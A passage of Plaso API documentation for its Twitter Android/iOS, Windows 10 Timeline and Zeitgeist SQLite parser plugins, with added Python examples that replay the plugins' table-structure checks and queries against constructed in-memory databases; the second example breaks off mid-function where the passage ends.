        username: twitter account handler. Type: str
    DATA_TYPE = 'twitter:android:status'
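The REQUIRED_STRUCTURE, QUERIES and SCHEMAS attributes above are what a SQLitePlugin uses to decide whether a database is one it understands and then to pull rows out of it. The following added example (not Plaso's own code) shows that gate in isolation: it builds an in-memory database from the search_queries, statuses and users CREATE TABLE statements copied from the twitter_android SCHEMAS, checks it against the plugin's REQUIRED_STRUCTURE, and runs the plugin's QUERIES, returning each row together with the name of the Parse*Row callback the plugin would hand it to. The sample rows are constructed, and the helper functions (build_database, missing_structure, run_queries) are this example's own, an approximation of the check the SQLitePlugin base class performs rather than its implementation. It also shows the failure mode a practitioner runs into with app databases from other versions: a table that exists but lacks a required column is reported per column, an absent table as None.

```python
"""Apply a Plaso-style REQUIRED_STRUCTURE check and QUERIES to a SQLite database.

Added example, not Plaso's code. REQUIRED_STRUCTURE, QUERIES and the three
CREATE TABLE statements are copied from the twitter_android plugin
documentation; the sample rows and helper functions are constructed here.
"""
import sqlite3

# Copied from TwitterAndroidPlugin.SCHEMAS (only the tables the queries touch).
SCHEMA = [
    'CREATE TABLE search_queries (_id INTEGER PRIMARY KEY,type INT,name TEXT NOT NULL,query TEXT NOT NULL,query_id INT,time INT,latitude REAL,longitude REAL,radius REAL,location TEXT,pc BLOB,cluster_titles BLOB)',
    'CREATE TABLE statuses (_id INTEGER PRIMARY KEY,status_id INT UNIQUE NOT NULL,author_id INT,content TEXT,source TEXT,created INT,in_r_user_id INT,in_r_status_id INT,favorited INT,latitude TEXT,longitude TEXT,place_data BLOB,entities TEXT,retweet_count INT,r_content TEXT,cards BLOB,flags INT,favorite_count INT,lang TEXT,supplemental_language TEXT,view_count INT,quoted_tweet_data BLOB,quoted_tweet_id INT,retweeted INT)',
    'CREATE TABLE users (_id INTEGER PRIMARY KEY,user_id INT UNIQUE NOT NULL,username TEXT,name TEXT,description TEXT,web_url TEXT,bg_color INT,location TEXT,structured_location BLOB,user_flags INT,followers INT,fast_followers INT DEFAULT 0,friends INT,statuses INT,profile_created INT,image_url TEXT,hash INT,updated INT,friendship INT,friendship_time INT,favorites INT DEFAULT 0,header_url TEXT,description_entities BLOB,url_entities BLOB,media_count INT,extended_profile_fields BLOB,pinned_tweet_id INT,link_color INT,advertiser_type TEXT,business_profile_state TEXT)',
]

# Copied from TwitterAndroidPlugin.REQUIRED_STRUCTURE: table -> required columns.
REQUIRED_STRUCTURE = {
    'search_queries': frozenset({'name', 'query', 'time'}),
    'statuses': frozenset({'_id', 'author_id', 'content', 'created', 'favorited', 'retweeted'}),
    'users': frozenset({'_id', 'description', 'followers', 'friends', 'friendship_time', 'image_url', 'location', 'name', 'profile_created', 'statuses', 'updated', 'user_id', 'username', 'web_url'}),
}

# Copied from TwitterAndroidPlugin.QUERIES: (SQL, name of the row callback).
QUERIES = [
    ('SELECT name, query, time FROM search_queries', 'ParseSearchRow'),
    ('SELECT statuses._id AS _id, statuses.author_id AS author_id, users.username AS username, statuses.content AS content, statuses.created AS time, statuses.favorited AS favorited, statuses.retweeted AS retweeted FROM statuses LEFT JOIN users ON statuses.author_id = users.user_id', 'ParseStatusRow'),
    ('SELECT _id, user_id, username, name, profile_created, description, web_url, location, followers, friends, statuses, image_url, updated, friendship_time FROM users', 'ParseContactRow'),
]

# Constructed sample rows (not real Twitter data); timestamps are milliseconds.
SAMPLE_ROWS = [
    ('INSERT INTO users (user_id, username, name, description, web_url, location, followers, friends, statuses, profile_created, image_url, updated, friendship_time) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?)',
     (1001, 'analyst', 'Example Analyst', 'constructed profile', 'https://example.invalid', 'Nowhere', 5, 7, 3, 1600000000000, 'https://example.invalid/a.png', 1600000001000, 0)),
    ('INSERT INTO statuses (status_id, author_id, content, created, favorited, retweeted) VALUES (?, ?, ?, ?, ?, ?)',
     (5001, 1001, 'constructed status text', 1600000002000, 0, 1)),
    ('INSERT INTO search_queries (name, query, time) VALUES (?, ?, ?)',
     ('dfir', 'dfir', 1600000003000)),
]


def build_database(schema_statements, inserts=()):
    """Creates an in-memory SQLite database from CREATE TABLE statements and rows."""
    connection = sqlite3.connect(':memory:')
    for statement in schema_statements:
        connection.execute(statement)
    for statement, parameters in inserts:
        connection.execute(statement, parameters)
    connection.commit()
    return connection


def build_sample_database():
    """The constructed twitter_android-shaped database used below."""
    return build_database(SCHEMA, SAMPLE_ROWS)


def table_columns(connection, table_name):
    """Returns the column names of a table (PRAGMA table_info yields cid, name, type, ...)."""
    query = 'PRAGMA table_info("{0:s}")'.format(table_name.replace('"', '""'))
    return frozenset(row[1] for row in connection.execute(query))


def missing_structure(connection, required_structure):
    """Compares a database against a REQUIRED_STRUCTURE mapping.

    Returns {table: frozenset(missing columns)} for tables lacking columns and
    {table: None} for tables that do not exist. An empty dict means the
    database passes the structure check.
    """
    existing = {row[0] for row in connection.execute(
        "SELECT name FROM sqlite_master WHERE type = 'table'")}
    missing = {}
    for table_name, columns in required_structure.items():
        if table_name not in existing:
            missing[table_name] = None
            continue
        absent = columns - table_columns(connection, table_name)
        if absent:
            missing[table_name] = absent
    return missing


def run_queries(connection, queries):
    """Runs each (query, callback) pair; returns (callback, row as dict) tuples."""
    connection.row_factory = sqlite3.Row
    results = []
    for query, callback in queries:
        for row in connection.execute(query):
            results.append((callback, dict(row)))
    return results


def main():
    connection = build_sample_database()
    print('missing:', missing_structure(connection, REQUIRED_STRUCTURE))
    for callback, row in run_queries(connection, QUERIES):
        print(callback, row)
    # A database that only has search_queries fails the check for the other tables.
    partial = build_database(SCHEMA[:1])
    print('missing (partial):', missing_structure(partial, REQUIRED_STRUCTURE))


if __name__ == '__main__':
    main()
```

Running the script prints an empty missing dict for the full database, one row per callback, and `{'statuses': None, 'users': None}` for the partial one. The column-level report is the useful part when a plugin silently skips a database: comparing the output against the SCHEMAS entry for the app version you actually have tells you which column rename or removal broke the match.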

plaso.parsers.sqlite_plugins.twitter_ios module

SQLite parser plugin for Twitter on iOS 8+ database files.

class plaso.parsers.sqlite_plugins.twitter_ios.TwitterIOSContactEventData
    Bases: plaso.containers.events.EventData
    Twitter on iOS 8+ contact event data.
        description: description of the profile. Type: str
        followers_count: number of accounts following the contact. Type: int
        following_count: number of accounts the contact is following. Type: int
        following: 1 if the contact is following the user’s account, 0 if not. Type: int
        location: location of the profile. Type: str
        name: name of the profile. Type: str
        profile_url: URL of the profile picture. Type: str
        query: SQL query that was used to obtain the event data. Type: str
        screen_name: screen name. Type: str
        url: URL of the profile. Type: str
    DATA_TYPE = 'twitter:ios:contact'

class plaso.parsers.sqlite_plugins.twitter_ios.TwitterIOSPlugin
    Bases: plaso.parsers.sqlite_plugins.interface.SQLitePlugin
    SQLite parser plugin for Twitter on iOS 8+ database files.


    The Twitter on iOS 8+ database file is typically stored in: /private/var/mobile/Containers/Data/Application/Library/Caches/databases/twitter.db
    DATA_FORMAT = 'Twitter on iOS 8 and later SQLite database (twitter.db) file'
    NAME = 'twitter_ios'
    ParseContactRow(parser_mediator, query, row, **unused_kwargs)
        Parses a contact row from the database.
        Parameters
        • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
        • query (str) – query that created the row.
        • row (sqlite3.Row) – row resulting from query.
    ParseStatusRow(parser_mediator, query, row, **unused_kwargs)
        Parses a status row from the database.
        Parameters
        • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
        • query (str) – query that created the row.
        • row (sqlite3.Row) – row resulting from query.
    QUERIES = [('SELECT createdDate, updatedAt, screenName, name, profileImageUrl,location, description, url, following, followersCount, followingCount FROM Users ORDER BY createdDate', 'ParseContactRow'), ('SELECT Statuses.date AS date, Statuses.text AS text, Statuses.userId AS user_id, Users.name AS name, Statuses.retweetCount AS retweetCount, Statuses.favoriteCount AS favoriteCount, Statuses.favorited AS favorited, Statuses.updatedAt AS updatedAt FROM Statuses LEFT join Users ON Statuses.userId = Users.id ORDER BY date', 'ParseStatusRow')]
    REQUIRED_STRUCTURE = {'Statuses': frozenset({'date', 'favoriteCount', 'favorited', 'retweetCount', 'text', 'updatedAt', 'userId'}), 'Users': frozenset({'createdDate', 'description', 'followersCount', 'following', 'followingCount', 'id', 'location', 'name', 'profileImageUrl', 'screenName', 'updatedAt', 'url'})}


SCHEMAS = [{
    'Lists': "CREATE TABLE Lists ( 'id' INTEGER PRIMARY KEY, 'name' TEXT, 'slug' TEXT, 'desc' TEXT, 'private' INTEGER, 'subscriberCount' INTEGER, 'memberCount' INTEGER, 'userId' INTEGER, 'updatedAt' REAL )",
    'ListsShadow': "CREATE TABLE ListsShadow ( 'id' INTEGER PRIMARY KEY, 'name' TEXT, 'slug' TEXT, 'desc' TEXT, 'private' INTEGER, 'subscriberCount' INTEGER, 'memberCount' INTEGER, 'userId' INTEGER, 'updatedAt' REAL )",
    'MyRetweets': "CREATE TABLE MyRetweets ( 'statusId' INTEGER PRIMARY KEY, 'myRetweetId' INTEGER )",
    'Statuses': "CREATE TABLE Statuses ( 'id' INTEGER PRIMARY KEY, 'text' TEXT, 'date' REAL, 'userId' INTEGER, 'inReplyToStatusId' INTEGER, 'retweetedStatusId' INTEGER, 'geotag' BLOB, 'entities' BLOB, 'card' BLOB, 'cardUsers' BLOB, 'primaryCardType' INTEGER, 'cardVersion' INTEGER, 'retweetCount' INTEGER, 'favoriteCount' INTEGER, 'favorited' INTEGER, 'updatedAt' REAL, 'extraScribeItem' BLOB, 'withheldScope' TEXT, 'withheldInCountries' TEXT, 'inReplyToUsername' TEXT, 'possiblySensitive' INTEGER, 'isPossiblySensitiveAppealable' INTEGER, 'isLifelineAlert' INTEGER, 'isTruncated' INTEGER, 'previewLength' INTEGER, 'fullTextLength' INTEGER, 'lang' TEXT, 'supplmentalLanguage' TEXT, 'includeInProfileTimeline' INTEGER, 'quotedStatusId' INTEGER, 'source' TEXT )",
    'StatusesShadow': "CREATE TABLE StatusesShadow ( 'id' INTEGER PRIMARY KEY, 'text' TEXT, 'date' REAL, 'userId' INTEGER, 'inReplyToStatusId' INTEGER, 'retweetedStatusId' INTEGER, 'geotag' BLOB, 'entities' BLOB, 'card' BLOB, 'cardUsers' BLOB, 'primaryCardType' INTEGER, 'cardVersion' INTEGER, 'retweetCount' INTEGER, 'favoriteCount' INTEGER, 'favorited' INTEGER, 'updatedAt' REAL, 'extraScribeItem' BLOB, 'withheldScope' TEXT, 'withheldInCountries' TEXT, 'inReplyToUsername' TEXT, 'possiblySensitive' INTEGER, 'isPossiblySensitiveAppealable' INTEGER, 'isLifelineAlert' INTEGER, 'isTruncated' INTEGER, 'previewLength' INTEGER, 'fullTextLength' INTEGER, 'lang' TEXT, 'supplementalLanguage' TEXT, 'includeInProfileTimeline' INTEGER, 'quotedStatusId' INTEGER, 'source' TEXT )",
    'Users': "CREATE TABLE Users ( 'id' INTEGER PRIMARY KEY, 'screenName' TEXT COLLATE NOCASE, 'profileImageUrl' TEXT, 'profileBannerUrl' TEXT, 'profileLinkColorHexTriplet' INTEGER, 'name' TEXT, 'location' TEXT, 'structuredLocation' BLOB, 'description' TEXT, 'url' TEXT, 'urlEntities' BLOB, 'bioEntities' BLOB, 'protected' INTEGER, 'verified' INTEGER, 'following' INTEGER, 'deviceFollowing' INTEGER, 'advertiserAccountType' INTEGER, 'statusesCount' INTEGER, 'mediaCount' INTEGER, 'favoritesCount' INTEGER, 'followingCount' INTEGER, 'followersCount' INTEGER, 'followersCountFast' INTEGER, 'followersCountNormal' INTEGER, 'couldBeStale' INTEGER, 'isLifelineInstitution' INTEGER, 'hasCollections' INTEGER, 'updatedAt' REAL, 'createdDate' REAL, 'isTranslator' INTEGER, 'hasExtendedProfileFields' INTEGER, 'extendedProfileFields' BLOB, 'pinnedTweetId' INTEGER, 'businessProfileState' INTEGER, 'analyticsType' INTEGER )",
    'UsersShadow': "CREATE TABLE UsersShadow ( 'id' INTEGER PRIMARY KEY, 'screenName' TEXT COLLATE NOCASE, 'profileImageUrl' TEXT, 'profileBannerUrl' TEXT, 'profileLinkColorHexTriplet' INTEGER, 'name' TEXT, 'location' TEXT, 'structuredLocation' BLOB, 'description' TEXT, 'url' TEXT, 'urlEntities' BLOB, 'bioEntities' BLOB, 'protected' INTEGER, 'verified' INTEGER, 'following' INTEGER, 'deviceFollowing' INTEGER, 'advertiserAccountType' INTEGER, 'statusesCount' INTEGER, 'mediaCount' INTEGER, 'favoritesCount' INTEGER, 'followingCount' INTEGER, 'followersCount' INTEGER, 'followersCountFast' INTEGER, 'followersCountNormal' INTEGER, 'couldBeStale' INTEGER, 'isLifelineInstitution' INTEGER, 'hasCollections' INTEGER, 'updatedAt' REAL, 'createdDate' REAL, 'isTranslator' INTEGER, 'hasExtendedProfileFields' INTEGER, 'extendedProfileFields' BLOB, 'pinnedTweetId' INTEGER, 'businessProfileState' INTEGER, 'analyticsType' INTEGER )"}]

class plaso.parsers.sqlite_plugins.twitter_ios.TwitterIOSStatusEventData
    Bases: plaso.containers.events.EventData

    Parent class for Twitter on iOS 8+ status events.


    favorite_count
        number of times the status message has been favorited.
        Type: int
    favorited
        value to mark status as favorite by the account.
        Type: int
    name
        user's profile name.
        Type: str
    query
        SQL query that was used to obtain the event data.
        Type: str
    retweet_count
        number of times the status message has been retweeted (the Statuses table stores retweetCount as INTEGER).
        Type: int
    text
        content of the status message.
        Type: str
    user_id
        user unique identifier.
        Type: int

    DATA_TYPE = 'twitter:ios:status'

plaso.parsers.sqlite_plugins.windows_timeline module

SQLite parser plugin for Windows 10 Timeline database files.

class plaso.parsers.sqlite_plugins.windows_timeline.WindowsTimelineGenericEventData
    Bases: plaso.containers.events.EventData

    Windows Timeline database generic event data.

    package_identifier
        the package ID or path to the executable run. Depending on the program, this either looks like a path (for example, c:\python34\python.exe) or like a package name (for example Docker.DockerForWindows.Settings).
        Type: str
    description
        this is an optional field, used to describe the action in the timeline view, and is usually populated with the path of the file currently open in the program described by package_identifier. Otherwise None.
        Type: str
    application_display_name
        a more human-friendly version of the package_identifier, such as 'Docker for Windows' or 'Microsoft Store'.
        Type: str


    DATA_TYPE = 'windows:timeline:generic'

class plaso.parsers.sqlite_plugins.windows_timeline.WindowsTimelinePlugin
    Bases: plaso.parsers.sqlite_plugins.interface.SQLitePlugin

    SQLite parser plugin for Windows 10 Timeline database files.

    The Windows 10 Timeline database file is typically stored in:
    %LOCALAPPDATA%\ConnectedDevicesPlatform\L.<username>\ActivitiesCache.db
    (that is, under the user's AppData\Local directory rather than the roaming %APPDATA%; the folder name under ConnectedDevicesPlatform depends on the account type).

    DATA_FORMAT = 'Windows 10 Timeline SQLite database (ActivitiesCache.db) file'

    NAME = 'windows_timeline'

    ParseGenericRow(parser_mediator, query, row, **unused_kwargs)
        Parses a generic Windows Timeline row.

        Parameters
            • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
            • query (str) – query that created the row.
            • row (sqlite3.Row) – row.

    ParseUserEngagedRow(parser_mediator, query, row, **unused_kwargs)
        Parses a timeline row that describes a user interacting with an app.

        Parameters
            • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
            • query (str) – query that created the row.
            • row (sqlite3.Row) – row.

    QUERIES = [
        ('SELECT StartTime, Payload, PackageName FROM Activity INNER JOIN Activity_PackageId ON Activity.Id = Activity_PackageId.ActivityId WHERE instr(Payload, "UserEngaged") > 0 AND Platform = "packageid"', 'ParseUserEngagedRow'),
        ('SELECT StartTime, Payload, AppId FROM Activity WHERE instr(Payload, "UserEngaged") = 0', 'ParseGenericRow')]

    REQUIRED_STRUCTURE = {
        'Activity': frozenset({'AppId', 'Id', 'Payload', 'StartTime'}),
        'Activity_PackageId': frozenset({'ActivityId', 'PackageName'})}


    SCHEMAS = [{
        'Activity': 'CREATE TABLE [Activity]([Id] GUID PRIMARY KEY NOT NULL, [AppId] TEXT NOT NULL, [PackageIdHash] TEXT, [AppActivityId] TEXT, [ActivityType] INT NOT NULL, [ActivityStatus] INT NOT NULL, [ParentActivityId] GUID, [Tag] TEXT, [Group] TEXT, [MatchId] TEXT, [LastModifiedTime] DATETIME NOT NULL, [ExpirationTime] DATETIME, [Payload] BLOB, [Priority] INT, [IsLocalOnly] INT, [PlatformDeviceId] TEXT, [CreatedInCloud] DATETIME, [StartTime] DATETIME, [EndTime] DATETIME, [LastModifiedOnClient] DATETIME, [GroupAppActivityId] TEXT, [ClipboardPayload] BLOB, [EnterpriseId] TEXT, [OriginalPayload] BLOB, [OriginalLastModifiedOnClient] DATETIME, [ETag] INT NOT NULL)',
        'ActivityAssetCache': 'CREATE TABLE [ActivityAssetCache]([ResourceId] INTEGER PRIMARY KEY AUTOINCREMENT NOT NULL, [AppId] TEXT NOT NULL, [AssetHash] TEXT NOT NULL, [TimeToLive] DATETIME NOT NULL, [AssetUri] TEXT, [AssetId] TEXT, [AssetKey] TEXT, [Contents] BLOB)',
        'ActivityOperation': 'CREATE TABLE [ActivityOperation]([OperationOrder] INTEGER PRIMARY KEY ASC NOT NULL, [Id] GUID NOT NULL, [OperationType] INT NOT NULL, [AppId] TEXT NOT NULL, [PackageIdHash] TEXT, [AppActivityId] TEXT, [ActivityType] INT NOT NULL, [ParentActivityId] GUID, [Tag] TEXT, [Group] TEXT, [MatchId] TEXT, [LastModifiedTime] DATETIME NOT NULL, [ExpirationTime] DATETIME, [Payload] BLOB, [Priority] INT, [CreatedTime] DATETIME, [Attachments] TEXT, [PlatformDeviceId] TEXT, [CreatedInCloud] DATETIME, [StartTime] DATETIME NOT NULL, [EndTime] DATETIME, [LastModifiedOnClient] DATETIME NOT NULL, [CorrelationVector] TEXT, [GroupAppActivityId] TEXT, [ClipboardPayload] BLOB, [EnterpriseId] TEXT, [OriginalPayload] BLOB, [OriginalLastModifiedOnClient] DATETIME, [ETag] INT NOT NULL)',
        'Activity_PackageId': 'CREATE TABLE [Activity_PackageId]([ActivityId] GUID NOT NULL, [Platform] TEXT NOT NULL, [PackageName] TEXT NOT NULL, [ExpirationTime] DATETIME NOT NULL)',
        'AppSettings': 'CREATE TABLE [AppSettings]([AppId] TEXT PRIMARY KEY NOT NULL, [SettingsPropertyBag] BLOB, [AppTitle] TEXT, [Logo4141] TEXT)',
        'ManualSequence': 'CREATE TABLE [ManualSequence]([Key] TEXT PRIMARY KEY NOT NULL, [Value] INT NOT NULL)',
        'Metadata': 'CREATE TABLE [Metadata]([Key] TEXT PRIMARY KEY NOT NULL, [Value] TEXT)'}, {
        'Activity': 'CREATE TABLE [Activity]([Id] GUID PRIMARY KEY NOT NULL, [AppId] TEXT NOT NULL, [PackageIdHash] TEXT, [AppActivityId] TEXT, [ActivityType] INT NOT NULL, [ActivityStatus] INT NOT NULL, [ParentActivityId] GUID, [Tag] TEXT, [Group] TEXT, [MatchId] TEXT, [LastModifiedTime] DATETIME NOT NULL, [ExpirationTime] DATETIME, [Payload] BLOB, [Priority] INT, [IsLocalOnly] INT, [PlatformDeviceId] TEXT, [CreatedInCloud] DATETIME, [StartTime] DATETIME, [EndTime] DATETIME, [LastModifiedOnClient] DATETIME, [GroupAppActivityId] TEXT, [ClipboardPayload] BLOB, [EnterpriseId] TEXT, [OriginalPayload] BLOB, [UserActionState] INT,[IsRead] INT,[OriginalLastModifiedOnClient] DATETIME, [GroupItems] TEXT, [ETag] INT NOT NULL)',
        'ActivityAssetCache': 'CREATE TABLE [ActivityAssetCache]([ResourceId] INTEGER PRIMARY KEY AUTOINCREMENT NOT NULL, [AppId] TEXT NOT NULL, [AssetHash] TEXT NOT NULL, [TimeToLive] DATETIME NOT NULL, [AssetUri] TEXT, [AssetId] TEXT, [AssetKey] TEXT, [Contents] BLOB)',
        'ActivityOperation': 'CREATE TABLE [ActivityOperation]([OperationOrder] INTEGER PRIMARY KEY ASC NOT NULL, [Id] GUID NOT NULL, [OperationType] INT NOT NULL, [AppId] TEXT NOT NULL, [PackageIdHash] TEXT, [AppActivityId] TEXT, [ActivityType] INT NOT NULL, [ParentActivityId] GUID, [Tag] TEXT, [Group] TEXT, [MatchId] TEXT, [LastModifiedTime] DATETIME NOT NULL, [ExpirationTime] DATETIME, [Payload] BLOB, [Priority] INT, [CreatedTime] DATETIME, [OperationExpirationTime] DATETIME,[Attachments] TEXT, [PlatformDeviceId] TEXT, [CreatedInCloud] DATETIME, [StartTime] DATETIME NOT NULL, [EndTime] DATETIME, [LastModifiedOnClient] DATETIME NOT NULL, [CorrelationVector] TEXT, [GroupAppActivityId] TEXT, [ClipboardPayload] BLOB, [EnterpriseId] TEXT, [UserActionState] INT,[IsRead] INT,[OriginalPayload] BLOB, [OriginalLastModifiedOnClient] DATETIME, [UploadAllowedByPolicy] INT NOT NULL DEFAULT 1, [PatchFields] BLOB, [GroupItems] TEXT, [ETag] INT NOT NULL)',
        'Activity_PackageId': 'CREATE TABLE [Activity_PackageId]([ActivityId] GUID NOT NULL, [Platform] TEXT NOT NULL COLLATE NOCASE, [PackageName] TEXT NOT NULL COLLATE NOCASE, [ExpirationTime] DATETIME NOT NULL)',
        'AppSettings': 'CREATE TABLE [AppSettings]([AppId] TEXT PRIMARY KEY NOT NULL, [SettingsPropertyBag] BLOB, [AppTitle] TEXT, [Logo4141] TEXT)',
        'DataEncryptionKeys': 'CREATE TABLE [DataEncryptionKeys]([KeyVersion] INTEGER PRIMARY KEY NOT NULL, [KeyValue] TEXT NOT NULL COLLATE NOCASE, [CreatedInCloudTime] DATETIME NOT NULL)',
        'ManualSequence': 'CREATE TABLE [ManualSequence]([Key] TEXT PRIMARY KEY NOT NULL, [Value] INT NOT NULL)',
        'Metadata': 'CREATE TABLE [Metadata]([Key] TEXT PRIMARY KEY NOT NULL, [Value] TEXT)'}]

class plaso.parsers.sqlite_plugins.windows_timeline.WindowsTimelineUserEngagedEventData
    Bases: plaso.containers.events.EventData

    Windows Timeline database User Engaged event data.

    Contains information describing how long a user interacted with an application for.

    package_identifier
        the package ID or location of the executable the user interacted with.
        Type: str
    reporting_app
        the name of the application that reported the user's interaction. This is the name of a monitoring tool, for example "ShellActivityMonitor".
        Type: str
    active_duration_seconds
        the number of seconds the user spent interacting with the program.
        Type: int

    DATA_TYPE = 'windows:timeline:user_engaged'

plaso.parsers.sqlite_plugins.zeitgeist module

SQLite parser plugin for Zeitgeist activity database files.

class plaso.parsers.sqlite_plugins.zeitgeist.ZeitgeistActivityDatabasePlugin
    Bases: plaso.parsers.sqlite_plugins.interface.SQLitePlugin

    SQLite parser plugin for Zeitgeist activity database files.

    Zeitgeist is a service which logs the user activities and events, anywhere from files opened to websites visited and conversations.

    DATA_FORMAT = 'Zeitgeist activity SQLite database file'

    NAME = 'zeitgeist'

    ParseZeitgeistEventRow(parser_mediator, query, row, **unused_kwargs)
        Parses a zeitgeist event row.

        Parameters
            • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
            • query (str) – query that created the row.
            • row (sqlite3.Row) – row.

    QUERIES = [('SELECT id, timestamp, subj_uri FROM event_view', 'ParseZeitgeistEventRow')]

    REQUIRED_STRUCTURE = {'actor': frozenset({}), 'event': frozenset({'id', 'subj_id', 'timestamp'}), 'uri': frozenset({'id'})}


    SCHEMAS = [{
        'actor': 'CREATE TABLE actor ( id INTEGER PRIMARY KEY AUTOINCREMENT, value VARCHAR UNIQUE )',
        'event': 'CREATE TABLE event ( id INTEGER, timestamp INTEGER, interpretation INTEGER, manifestation INTEGER, actor INTEGER, payload INTEGER, subj_id INTEGER, subj_interpretation INTEGER, subj_manifestation INTEGER, subj_origin INTEGER, subj_mimetype INTEGER, subj_text INTEGER, subj_storage INTEGER, origin INTEGER, subj_id_current INTEGER, CONSTRAINT interpretation_fk FOREIGN KEY(interpretation) REFERENCES interpretation(id) ON DELETE CASCADE, CONSTRAINT manifestation_fk FOREIGN KEY(manifestation) REFERENCES manifestation(id) ON DELETE CASCADE, CONSTRAINT actor_fk FOREIGN KEY(actor) REFERENCES actor(id) ON DELETE CASCADE, CONSTRAINT origin_fk FOREIGN KEY(origin) REFERENCES uri(id) ON DELETE CASCADE, CONSTRAINT payload_fk FOREIGN KEY(payload) REFERENCES payload(id) ON DELETE CASCADE, CONSTRAINT subj_id_fk FOREIGN KEY(subj_id) REFERENCES uri(id) ON DELETE CASCADE, CONSTRAINT subj_id_current_fk FOREIGN KEY(subj_id_current) REFERENCES uri(id) ON DELETE CASCADE, CONSTRAINT subj_interpretation_fk FOREIGN KEY(subj_interpretation) REFERENCES interpretation(id) ON DELETE CASCADE, CONSTRAINT subj_manifestation_fk FOREIGN KEY(subj_manifestation) REFERENCES manifestation(id) ON DELETE CASCADE, CONSTRAINT subj_origin_fk FOREIGN KEY(subj_origin) REFERENCES uri(id) ON DELETE CASCADE, CONSTRAINT subj_mimetype_fk FOREIGN KEY(subj_mimetype) REFERENCES mimetype(id) ON DELETE CASCADE, CONSTRAINT subj_text_fk FOREIGN KEY(subj_text) REFERENCES text(id) ON DELETE CASCADE, CONSTRAINT subj_storage_fk FOREIGN KEY(subj_storage) REFERENCES storage(id) ON DELETE CASCADE, CONSTRAINT unique_event UNIQUE (timestamp, interpretation, manifestation, actor, subj_id) )',
        'extensions_conf': 'CREATE TABLE extensions_conf ( extension VARCHAR, key VARCHAR, value BLOB, CONSTRAINT unique_extension UNIQUE (extension, key) )',
        'interpretation': 'CREATE TABLE interpretation ( id INTEGER PRIMARY KEY AUTOINCREMENT, value VARCHAR UNIQUE )',
        'manifestation': 'CREATE TABLE manifestation ( id INTEGER PRIMARY KEY AUTOINCREMENT, value VARCHAR UNIQUE )',
        'mimetype': 'CREATE TABLE mimetype ( id INTEGER PRIMARY KEY AUTOINCREMENT, value VARCHAR UNIQUE )',
        'payload': 'CREATE TABLE payload (id INTEGER PRIMARY KEY, value BLOB)',
        'schema_version': 'CREATE TABLE schema_version ( schema VARCHAR PRIMARY KEY ON CONFLICT REPLACE, version INT )',
        'storage': 'CREATE TABLE storage ( id INTEGER PRIMARY KEY, value VARCHAR UNIQUE, state INTEGER, icon VARCHAR, display_name VARCHAR )',
        'text': 'CREATE TABLE text ( id INTEGER PRIMARY KEY, value VARCHAR UNIQUE )',
        'uri': 'CREATE TABLE uri ( id INTEGER PRIMARY KEY, value VARCHAR UNIQUE )'}]

class plaso.parsers.sqlite_plugins.zeitgeist.ZeitgeistActivityEventData
    Bases: plaso.containers.events.EventData

    Zeitgeist activity event data.

    offset
        identifier of the row, from which the event data was extracted.
        Type: str
    query
        SQL query that was used to obtain the event data.
        Type: str
    subject_uri
        subject URI.
        Type: str

    DATA_TYPE = 'zeitgeist:activity'
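The SQLite plugins documented above all follow the same contract: REQUIRED_STRUCTURE names the tables and columns a database must have before the plugin will touch it, and QUERIES pairs each SQL statement with the name of the row callback that turns a result row into event data. The following is an added example, not Plaso's code, that replays WindowsTimelinePlugin's gate and queries against a constructed in-memory ActivitiesCache.db with only the required columns. The JSON field names inside Payload and AppId (reportingApp, activeDurationSeconds, appDisplayName, description, and the list of {application, platform} entries), the epoch-seconds StartTime and the sample rows are assumptions about the payload shape, not taken from the page; the query string literals are single-quoted so they do not depend on SQLite's double-quoted-string compatibility setting.

```python
"""Replay of how a Plaso SQLitePlugin is driven (added example, not Plaso code)."""
import json
import sqlite3
from datetime import datetime, timezone

# Only the columns REQUIRED_STRUCTURE names are created; the real database
# has many more (see the SCHEMAS constant in the documentation).
SCHEMA_SQL = """
CREATE TABLE Activity (
    Id GUID PRIMARY KEY NOT NULL, AppId TEXT NOT NULL, Payload BLOB,
    StartTime DATETIME);
CREATE TABLE Activity_PackageId (
    ActivityId GUID NOT NULL, Platform TEXT NOT NULL, PackageName TEXT NOT NULL,
    ExpirationTime DATETIME NOT NULL);
"""

REQUIRED_STRUCTURE = {
    'Activity': frozenset({'AppId', 'Id', 'Payload', 'StartTime'}),
    'Activity_PackageId': frozenset({'ActivityId', 'PackageName'})}

# Plaso's two queries, string literals single-quoted for portability.
QUERIES = [
    ("SELECT StartTime, Payload, PackageName FROM Activity INNER JOIN "
     "Activity_PackageId ON Activity.Id = Activity_PackageId.ActivityId "
     "WHERE instr(Payload, 'UserEngaged') > 0 AND Platform = 'packageid'",
     'ParseUserEngagedRow'),
    ("SELECT StartTime, Payload, AppId FROM Activity "
     "WHERE instr(Payload, 'UserEngaged') = 0", 'ParseGenericRow')]


def check_required_structure(connection):
    """The gate applied before any query runs: every table in
    REQUIRED_STRUCTURE must exist and contain the listed columns."""
    for table, columns in REQUIRED_STRUCTURE.items():
        present = {row[1] for row in connection.execute(
            'PRAGMA table_info({0:s})'.format(table))}
        if not columns <= present:
            return False
    return True


def parse_user_engaged_row(row):
    """Stand-in for ParseUserEngagedRow; payload field names are assumed."""
    payload = json.loads(row['Payload'])
    return {
        'data_type': 'windows:timeline:user_engaged',
        'timestamp': datetime.fromtimestamp(row['StartTime'], tz=timezone.utc),
        'package_identifier': row['PackageName'],
        'reporting_app': payload.get('reportingApp'),
        'active_duration_seconds': int(payload.get('activeDurationSeconds', 0))}


def parse_generic_row(row):
    """Stand-in for ParseGenericRow: AppId is assumed to be a JSON list of
    platform-specific identifiers; prefer the exe path, then the package id."""
    payload = json.loads(row['Payload'])
    app_ids = {entry['platform']: entry['application']
               for entry in json.loads(row['AppId'])}
    package_identifier = (app_ids.get('x_exe_path') or app_ids.get('packageid')
                          or next(iter(app_ids.values()), None))
    return {
        'data_type': 'windows:timeline:generic',
        'timestamp': datetime.fromtimestamp(row['StartTime'], tz=timezone.utc),
        'package_identifier': package_identifier,
        'application_display_name': payload.get('appDisplayName'),
        'description': payload.get('description')}


CALLBACKS = {'ParseUserEngagedRow': parse_user_engaged_row,
             'ParseGenericRow': parse_generic_row}


def extract_events(connection):
    """Run every (query, callback) pair against the database."""
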